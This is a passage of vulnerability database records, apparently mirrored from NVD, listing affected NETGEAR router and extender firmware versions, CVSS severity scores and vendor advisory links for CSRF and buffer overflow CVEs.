"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2E9EF43B-2542-44CE-A1D6-DECCCFBC1F5F",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D264AB39-63DD-4B32-9A91-D86A3700733D",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "29B13F94-F151-4F00-95C3-D9FB22B3CC2B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE9CF95-192E-4D43-9DAD-2C8D9AF045E9",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DFD7557-D13D-40EB-94AD-AF092CDE587A",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3647BF25-4B37-4957-9E9D-10C1E78D4D9C",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D0512B6-4648-419C-8710-88E154944201",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "329E52C3-1C01-46DB-9151-0B4C0810AEB0",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B5D8AD4-6C67-4DC7-99DF-B29DBA4BC376",
"versionEndExcluding": "1.0.1.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E464FF8D-6202-40BA-9740-9CCE2BC23607",
"versionEndExcluding": "1.1.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD1F416B-C938-4AE3-B93E-03087575FF40",
"versionEndExcluding": "1.1.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.4.8, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000P before 1.0.0.86, R6900P before 1.0.0.56, R7300 before 1.0.0.54, R8300 before 1.0.2.106, R8500 before 1.0.2.106, DGN2200v4 before 1.0.0.86, DGND2200Bv4 before 1.0.0.86, R6050 before 1.0.0.86, JR6150 before 1.0.1.10, R6220 before 1.1.0.50, and WNDR3700v5 before V1.1.0.48."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una vulnerabilidad de tipo CSRF. Esto afecta a R6300v2 versiones anteriores a 1.0.4.8, R6400v2 versiones anteriores a 1.0.2.32, R6700 versiones anteriores a 1.0.1.22, R6900 versiones anteriores a 1.0.1.22, R7000P versiones anteriores a 1.0.0.86, R6900P versiones anteriores a 1.0.0.56, R7300 versiones anteriores a 1.0.0.54, R8300 versiones anteriores a 1.0.2.106, R8500 versiones anteriores a 1.0.2.106, DGN2200v4 versiones anteriores a 1.0.0.86, DGND2200Bv4 versiones anteriores a 1.0.0.86, R6050 versiones anteriores a 1.0.0.86, JR6150 versiones anteriores a 1.0.1.10, R6220 versiones anteriores a 1.1.0.50 y WNDR3700v5 versiones anteriores a V1.1.0.48."
}
],
"id": "CVE-2017-18755",
"lastModified": "2024-11-21T03:20:50.513",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T17:15:11.777",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051493/Security-Advisory-for-Cross-Site-Request-Forgery-on-Routers-and-Modem-Routers-PSV-2017-0333"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 16:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F3464F16-A6EB-47C0-B2B5-54E86743DC70",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E43DA92A-E429-459F-8B34-DDED55F5590B",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C3255EE-BBE5-4EBE-92CC-D0C6E6D8563F",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24E4CE14-4FC5-4F73-BFC8-F0B0D924F788",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "026E5574-7296-46A2-916D-7FF7BD3F728A",
"versionEndExcluding": "1.0.9.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59C6F6E4-C411-486E-BDBF-75F0ABEF5112",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B9FA153F-24E0-47DE-94B4-10F51999BCF0",
"versionEndExcluding": "1.0.3.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC34CE8E-8DB9-4A15-80D8-EB663482A892",
"versionEndExcluding": "1.0.2.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un atacante no autenticado. Esto afecta a R6250 versiones anteriores a 1.0.4.12, R6300v2 versiones anteriores a 1.0.4.12, R6700 versiones anteriores a 1.0.1.22, R6900 versiones anteriores a 1.0.1.22, R7000 versiones anteriores a 1.0.9.4, R7900 versiones anteriores a 1.0.1.12, R8000 versiones anteriores a 1.0.3.24 y R8500 versiones anteriores a 1.0.2.74 ."
}
],
"id": "CVE-2017-18744",
"lastModified": "2024-11-21T03:20:49.000",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T16:15:12.680",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.18, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.34, R7300DST before 1.0.0.62, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.54, and WNDR3400v3 before 1.0.1.18.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "061389AF-C8DA-48DF-8D7E-014A9B8D5D09",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "746ADED9-4517-4482-AAEF-ACD301B433F8",
"versionEndExcluding": "1.0.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "06C765FD-E0A0-4401-9C6F-5F3C7EF98A52",
"versionEndExcluding": "1.0.4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
